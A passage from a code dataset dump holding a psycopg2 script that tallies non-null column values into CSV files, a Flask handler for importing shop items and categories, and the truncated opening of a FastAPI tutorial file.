suite\n#-def\n", "repo_name": "i386x/doit", "sub_path": "tests/test_support/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 15829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "common.ModuleContext", "line_number": 69, "usage_type": "name"}, {"api_name": "common.ModuleContext.__init__", "line_number": 76, "usage_type": "call"}, {"api_name": "common.ModuleContext", "line_number": 76, "usage_type": "name"}, {"api_name": "time.localtime", "line_number": 77, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 78, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 92, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 93, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 94, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 95, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 99, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 100, "usage_type": "attribute"}, {"api_name": "doit.support.utils.Functor", "line_number": 104, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor.__init__", "line_number": 108, "usage_type": "call"}, {"api_name": "doit.support.utils.Functor", "line_number": 108, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor", "line_number": 112, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor.__init__", "line_number": 116, "usage_type": "call"}, {"api_name": "doit.support.utils.Functor", "line_number": 116, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 120, "usage_type": "attribute"}, {"api_name": "doit.support.utils.ordinal_suffix", "line_number": 165, "usage_type": "call"}, {"api_name": "doit.support.utils.ordinal_suffix", "line_number": 166, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 170, "usage_type": "attribute"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 177, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 178, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 179, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 180, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 182, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 183, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 184, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 186, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 187, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 189, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 190, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 191, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 196, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 197, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 198, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 199, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 200, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 204, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 209, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 210, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 214, "usage_type": "attribute"}, {"api_name": "doit.support.utils.timestamp", "line_number": 223, "usage_type": "call"}, {"api_name": "doit.support.utils.timestamp", "line_number": 246, "usage_type": "call"}, {"api_name": "doit.support.utils.timestamp", "line_number": 269, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 286, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 298, "usage_type": "attribute"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 301, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 302, "usage_type": "call"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 313, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 314, "usage_type": "call"}, {"api_name": "common.RAISE_FROM_ENTER", "line_number": 314, "usage_type": "argument"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 325, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 326, "usage_type": "call"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 337, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 338, "usage_type": "call"}, {"api_name": "common.SUPRESS", "line_number": 338, "usage_type": "argument"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 349, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 350, "usage_type": "call"}, {"api_name": "common.SUPRESS", "line_number": 350, "usage_type": "argument"}, {"api_name": "unittest.TestCase", "line_number": 361, "usage_type": "attribute"}, {"api_name": "doit.support.utils.Collection", "line_number": 364, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 369, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 374, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 379, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 380, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 394, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 414, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 434, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 461, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 480, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 481, "usage_type": "call"}, {"api_name": "doit.support.errors.DoItAssertionError", "line_number": 496, "usage_type": "argument"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 497, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 497, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 498, "usage_type": "call"}, {"api_name": "doit.support.errors.DoItAssertionError", "line_number": 499, "usage_type": "argument"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 500, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 500, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 501, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 502, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 502, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 507, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 507, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 508, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 508, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 509, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 514, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 514, "usage_type": "name"}, {"api_name": "unittest.TestSuite", "line_number": 519, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 520, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 521, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 522, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 523, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 524, "usage_type": "call"}, {"api_name": "unittest.makeSuite", "line_number": 525, "usage_type": "call"}]} +{"seq_id": "19232783049", "text": "import psycopg2\nimport logging\nimport os\nfrom time import time\nimport csv\n\n\ndef create_csv(filename):\n if os.path.isfile(filename):\n print('Result file already exist')\n else:\n print('Creating result file')\n with open(filename, 'w+') as myfile:\n wr = csv.writer(myfile, delimiter=\";\", lineterminator=\"\\n\")\n wr.writerow((\"Column\", \"Not Null\", \"Not_Null %\"))\n\n\ndef save_csv(main_data, filename):\n with open(filename, 'a') as myfile:\n try:\n wr = csv.writer(myfile, delimiter=\";\", lineterminator=\"\\n\")\n wr.writerow(main_data)\n except:\n print('Error while adding new line')\n\n\ndef queries():\n \"\"\"\n Choose your destiny\n :return: all chosen queries you want\n \"\"\"\n query_col_name1 = \"SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '\"\n query_col_name2 = \"' ORDER BY ORDINAL_POSITION\"\n query_count1 = \"SELECT COUNT(*) FROM \"\n query_count2 = \" is not null\"\n select_query = \"SELECT * FROM \"\n set_schema = \"SET search_path TO rocket_data_raw\"\n set_role = \"SET role employees\"\n return query_col_name1, query_col_name2, query_count1, query_count2\n\n\ndef close_con(con_cursor, con_connection):\n con_cursor.close()\n con_connection.close()\n print(\"PostgreSQL connection is closed\")\n\n\ndef manage_connection():\n pg_user = 'urs'\n pg_password = 'urs'\n pg_host = 'urs'\n pg_port = 'urs'\n db_name = 'urs'\n schema = 'urs'\n con = psycopg2.connect(user=pg_user, password=pg_password, host=pg_host, port=pg_port, database=db_name)\n main_cursor = con.cursor()\n return con, main_cursor\n\n\ndef do_query(cursor, table, total, output):\n print(\"\\nChecking the '\" + table + \"' table ...\")\n q1, q2, q3, q4 = queries()\n column_name_query = q1 + table + q2\n cursor.execute(column_name_query)\n raw = cursor.fetchall()\n\n cols = [x[0] for x in raw]\n for c in cols:\n print(\"- Checking column '\" + c + \"' ...\")\n not_null_query = q3 + table + ' WHERE ' + c + q4\n # not null values count\n cursor.execute(not_null_query)\n nulls = cursor.fetchone()[0]\n\n # log and append result in csv\n null_percent = \"{: 10.2f}\".format(nulls / total * 100)\n save_csv([c, nulls, null_percent + '%'], output, )\n print(\"--> Not null values \" + c + \": \" + \"{:,}\".format(nulls) + '/' + \"{:,}\".format(total) + ' | ' + null_percent + ' %\\n')\n\n\ndef execute():\n try:\n # tables in 'rocket_raw' schema with total row count\n # Note - you can decide to query every table total count if you decide but i didnt. i explicitly hard coded it :)\n tables = {'Employee1': 49937443, 'Employee2': 161776046, 'Employee3': 55300300, 'Employee4': 228049317, 'Employee5': 190534019,\n 'Employee6': 146851802}\n\n connection, cursor = manage_connection()\n if connection:\n print(\"\\n ---------------------------------------- Connection opened for ------------------------------------------------------- \\n\")\n print(connection.get_dsn_parameters(), \"\\n\")\n cursor.execute(\"SELECT version();\")\n record = cursor.fetchall()\n print(\"You are connected to - \", record, \"\\n\")\n\n # Operation starts now -----------------------------------------------------------------------------------------------------------\n # *****************************************************\n # SET UR SEARCH PATH TO YOUR SCHEMA HERE\n # *****************************************************\n cursor.execute(\"SET search_path TO ************UR SCHEMA********************\")\n for table, total in tables.items():\n filename = os.getcwd() + os.sep + 'Output' + os.sep + 'File_' + table + '.csv'\n print(filename)\n create_csv(filename)\n do_query(cursor, table, total, filename)\n close_con(cursor, connection)\n\n except psycopg2.DatabaseError as db_error:\n print(\"Error while connecting to PostgreSQL \", db_error)\n pass\n\n\nstart = time()\nexecute()\nend = time()\nprint(\"TIme {}'s\".format(end - start))\n", "repo_name": "pesto93/Postgres-with-python", "sub_path": "Sql_counts.py", "file_name": "Sql_counts.py", "file_ext": "py", "file_size_in_byte": 4192, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 14, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 21, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 55, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 102, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 102, "usage_type": "attribute"}, {"api_name": "psycopg2.DatabaseError", "line_number": 108, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 113, "usage_type": "call"}, {"api_name": "time.time", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "37861589923", "text": "import datetime\nfrom db import db\nfrom components.schemas.ShopUnitImport import ShopUnitImport\nfrom components.schemas.ShopUnit import ShopUnit\nfrom components.schemas.ShopUnitType import ShopUnitType\nfrom components.schemas.ShopUnitStatistic import ShopUnitStatistic\nfrom components.schemas.ShopUnitImportRequest import ShopUnitImportRequest\nfrom flask import request\nfrom my_logs.logg import info_log, warning_log\nfrom .base_function import delete_child, response_error_400, TIME_FORMAT\nfrom flask import Blueprint\n\n\nbp_imports = Blueprint('imports', __name__)\n\n\n\n\ndef valid_request_json(data: dict, time_format: str) -> bool:\n '''\n Проверка форматы даты и основной структуры\n '''\n\n if 'items' not in data or 'updateDate' not in data or len(data) != 2:\n info_log.warning('POST:/imports Проблемы с общей структурой входных данных')\n warning_log.warning(\n f'POST:/imports Проблемы с общей структурой входных данных:\\ndata={data}\\n, 400')\n return False\n\n try:\n datetime.datetime.strptime(data['updateDate'], time_format)\n return True\n except ValueError:\n info_log.warning(f'POST:/imports Проблемы с форматом даты')\n warning_log.warning(\n f'POST:/imports Проблемы с форматом даты:\\ndata={data}\\n, 400')\n return False\n\n\ndef is_category(node_id: object) -> bool:\n if node_id is None:\n return True\n node = ShopUnit.query.filter_by(id=node_id).first()\n if node is not None:\n category = node.type\n return category == 'CATEGORY'\n return True\n\n\ndef valid_structure_item(item: dict) -> bool:\n '''\n Проверяем все ли необходимые параметры нам передали.\n '''\n if item['type'] in ['CATEGORY', 'OFFER']:\n if all(key in item for key in ['id', 'name', 'type']) and item['name'] is not None:\n return True\n info_log.warning('POST:/imports Проблемы с отдельной структурой item')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item:\\nitem={item}\\n, 400')\n return False\n\n\ndef valid_item(item: dict) -> bool:\n '''\n Проверка: Дочерние эл-ты могут быть только у CATEGORY\n '''\n parent_id = value_or_none(dict_=item, key_='parentId')\n price = value_or_none(dict_=item, key_='price')\n if not is_category(parent_id):\n info_log.warning(f'POST:/imports родителем может быть только категория')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item (parent_id) :\\nitem={item}\\n, 400')\n return False\n if price is not None and price < 0:\n info_log.warning(f'POST:/imports цена должна быть больше 0')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item (price) :\\nitem={item}\\n, 400')\n return False\n return True\n\n\ndef value_or_none(dict_: dict, key_: str) -> object:\n if key_ in dict_:\n return dict_[key_]\n return None\n\n\ndef add_child(id_child: str, id_parent: object) -> None:\n '''\n У узла id_parent появился дочерний эл-т id_child\n '''\n parent = ShopUnit.query.filter_by(id=id_parent).first()\n if id_child != id_parent: # проверяем на циклы\n if parent is not None: # если это корень, то пропускаем шаг\n if parent.children is not None:\n parent.children = set(list(parent.children) + [id_child])\n else:\n parent.children = [id_child]\n\n\ndef check_type_context(type: str, price: object) -> bool:\n '''\n Проверка параметров, зависящих от типа\n '''\n if type == 'CATEGORY':\n if price is not None:\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов type={type} price!={price}, 400', )\n return False\n if type == 'OFFER':\n if price is None or price < 0:\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов type={type} price!={price}, 400', )\n return False\n\n return True\n\n\ndef save_statistic(node_id: str, parentId: object, name: str, type_: str, price: object, time_: datetime) -> None:\n '''\n Фиксируем любое изменение для статистики\n '''\n\n problem = ShopUnitStatistic.query.filter_by(id=node_id).filter_by(date=time_).first()\n if problem is None:\n new_node = ShopUnitStatistic(id=node_id, name=name, date=time_, type=type_)\n new_node.parentId = parentId\n new_node.price = price\n db.session.add(new_node)\n else:\n info_log.info('поле updateDate монотонно возрастает по условию')\n\n\ndef add_node(node_id: str, parentId: object, name: str, type_: str, price: object, time_: datetime) -> None:\n '''\n Функция добавления новой записи по id\n '''\n new_node = ShopUnit(id=node_id, name=name, date=time_, type=type_)\n new_node.parentId = parentId\n add_child(id_child=node_id, id_parent=parentId)\n new_node.price = price\n if type_ == 'CATEGORY':\n new_node.children = []\n db.session.add(new_node)\n\n save_import_fact(node_id, name, parentId, type_, price)\n save_statistic(node_id, parentId, name, type_, price, time_)\n\n info_log.info(f'POST:/imports Новый обьект id={node_id}, 200')\n\n\n\n\ndef update_date_parent(node_id: object, time_update: datetime) -> None:\n '''\n Функция обновления даты по id родителя\n '''\n if node_id is None:\n return\n node = ShopUnit.query.filter_by(id=node_id).first()\n if node is not None:\n node.date = time_update\n db.session.add(node)\n save_statistic(node_id=node.id, parentId=node.parentId, name=node.name, type_=node.type, price=node.price,\n time_=time_update)\n update_date_parent(node_id=node.parentId, time_update=time_update)\n\n\ndef save_import_fact(node_id: str, name: str, parentId: object, type: str, price: object) -> None:\n '''\n Фиксируем факт импорта\n '''\n unit_import = ShopUnitImport.query.filter_by(id=node_id).first()\n if unit_import is None:\n unit_import = ShopUnitImport(id=node_id, name=name, type=type)\n unit_import.name = name\n unit_import.parentId = parentId\n unit_import.type = type\n unit_import.price = price\n db.session.add(unit_import)\n\n\ndef save_request_fact(ids: set, update_date: datetime):\n '''\n Фиксируем факт отправки\n '''\n new_import_request = ShopUnitImportRequest()\n new_import_request.items = list(ids)\n new_import_request.updateDate = update_date\n db.session.add(new_import_request)\n\n\ndef update_node(node_id: str, old_parentId: object, parentId: object, name: str, type_: str, price: object,\n time_: datetime) -> None:\n '''\n Обновление значений записи в бд по id\n '''\n node = ShopUnit.query.filter_by(id=node_id).first()\n node.parentId = parentId\n delete_child(id_child=node_id, id_parent=old_parentId) #удаляем ребенка у старого родителя\n add_child(id_child=node_id, id_parent=parentId) #добавляем ребенка новому родителю\n node.name = name\n node.type = type_\n node.price = price\n node.date = time_\n db.session.add(node)\n\n save_import_fact(node_id, name, parentId, type_, price)\n save_statistic(node_id, parentId, name, type_, price, time_)\n\n info_log.info(\n f'POST:/imports Обновление обьекта id={node_id} name={name}, price={price}, date={time_} ch={node.children}, 200')\n\n\n\ndef id_duplicate(ids: set, new_id: str) -> bool:\n '''\n Проверка на наличие дубликатов id.\n ids - множество всех id в текущем запросе\n '''\n if new_id not in ids:\n ids.add(new_id)\n return False\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов id={ids} + {new_id}, 400', )\n return True\n\n\ndef main_handler_item(item: dict, update_date: datetime) -> int:\n '''\n Основная функция обработки валидной item и валидной update_date\n '''\n new_parent_id = value_or_none(dict_=item, key_='parentId')\n new_price = value_or_none(dict_=item, key_='price')\n\n node = ShopUnit.query.filter_by(id=item['id']).first()\n type_obj = ShopUnitType.query.filter_by(type=item['type']).first()\n new_type = type_obj.type\n\n if not check_type_context(type_obj.type, new_price):\n return response_error_400()\n\n if node is not None:\n # Если уже есть в базе такой id, значения нужно обновить запись\n if node.type != new_type:\n return 400\n old_parent_id = node.parentId\n update_node(node_id=item['id'], parentId=new_parent_id, name=item['name'],\n type_=new_type, price=new_price, time_=update_date, old_parentId=old_parent_id, )\n if old_parent_id is not None:\n #обновляем старого родителя (время)\n update_date_parent(old_parent_id, time_update=update_date)\n else:\n # иначе создаем новую запись\n add_node(node_id=item['id'], parentId=new_parent_id, name=item['name'], type_=new_type,\n price=new_price, time_=update_date)\n\n if new_parent_id is not None:\n # обновляем нового родителя (время)\n update_date_parent(new_parent_id, time_update=update_date)\n return 200\n\n\n@bp_imports.route('/imports', methods=['POST'])\ndef imports():\n '''\n Обработчик для импортирования новых товаров и/или категорий.\n '''\n\n info_log.info('handler:POST:/imports ')\n if not request.is_json:\n info_log.warning(f'handler:POST:/imports это не json')\n return response_error_400()\n\n data = request.get_json()\n\n if not valid_request_json(data, TIME_FORMAT):\n return response_error_400()\n\n update_date = datetime.datetime.strptime(data['updateDate'], TIME_FORMAT)\n update_date = update_date.isoformat()\n\n ids = set()\n for item in data['items']:\n if (not valid_structure_item(item)) or (not valid_item(item)) or (id_duplicate(ids, item['id'])):\n return response_error_400()\n if main_handler_item(item=item, update_date=update_date) != 200:\n info_log.warning('handler:POST:/imports Нельзя менять типы')\n return response_error_400()\n\n save_request_fact(ids, update_date)\n db.session.commit()\n return '', 200\n", "repo_name": "Alset-Nikolas/RestApiServis", "sub_path": "app/paths/imports.py", "file_name": "imports.py", "file_ext": "py", "file_size_in_byte": 11369, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 14, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 25, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 25, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 26, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 26, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 34, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 34, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 35, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 35, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 43, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 43, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 43, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 57, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 57, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 58, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 58, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 70, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 70, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 71, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 71, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 75, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 75, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 76, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 76, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 92, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 92, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 92, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 107, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 107, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 112, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 112, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic.query.filter_by", "line_number": 124, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic.query", "line_number": 124, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic", "line_number": 124, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic", "line_number": 126, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 129, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 129, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 129, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 131, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 131, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 138, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 144, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 144, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 144, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 149, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 149, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 160, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 160, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 160, "usage_type": "name"}, {"api_name": "db.db.session.add", "line_number": 163, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 163, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 163, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport.query.filter_by", "line_number": 173, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport.query", "line_number": 173, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport", "line_number": 173, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport", "line_number": 175, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 180, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 180, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 180, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImportRequest.ShopUnitImportRequest", "line_number": 187, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 190, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 190, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 190, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 198, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 198, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 198, "usage_type": "name"}, {"api_name": "base_function.delete_child", "line_number": 200, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 206, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 206, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 206, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 211, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 211, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 224, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 224, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 236, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 236, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 236, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType.query.filter_by", "line_number": 237, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType.query", "line_number": 237, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType", "line_number": 237, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 241, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 270, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 270, "usage_type": "name"}, {"api_name": "flask.request.is_json", "line_number": 271, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 271, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 272, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 272, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 273, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 275, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 275, "usage_type": "name"}, {"api_name": "base_function.TIME_FORMAT", "line_number": 277, "usage_type": "argument"}, {"api_name": "base_function.response_error_400", "line_number": 278, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 280, "usage_type": "call"}, {"api_name": "base_function.TIME_FORMAT", "line_number": 280, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 280, "usage_type": "attribute"}, {"api_name": "base_function.response_error_400", "line_number": 286, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 288, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 288, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 289, "usage_type": "call"}, {"api_name": "db.db.session.commit", "line_number": 292, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 292, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 292, "usage_type": "name"}]} +{"seq_id": "11443707863", "text": "'''\n _oo0oo_\n o8888888o\n 88\" . \"88\n (| -_- |)\n 0\\ = /0\n ___/`---'\\___\n .' \\\\| |// '.\n / \\\\||| : |||// \\\n / _||||| -:- |||||- \\\n | | \\\\\\ - /// | |\n | \\_| ''\\---/'' |_/ |\n \\ .-\\__ '-' ___/-. /\n ___'. .' /--.--\\ `. .'___\n .\"\" '< `.___\\_<|>_/___.' >' \"\".\n | | : `- \\`.;`\\ _ /`;.`/ - ` : | |\n \\ \\ `_. \\_ __\\ /__ _/ .-` / /\n =====`-.____`.___ \\_____/___.-`___.-'=====\n `=---='\n\n\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n 佛祖保佑 永不宕机 永无BUG\n'''\n# -*- coding: utf-8 -*-\n# @Project : FastAPIBook\n# @File Name : 8_query_parameters.py\n# @Author : liushuangdan 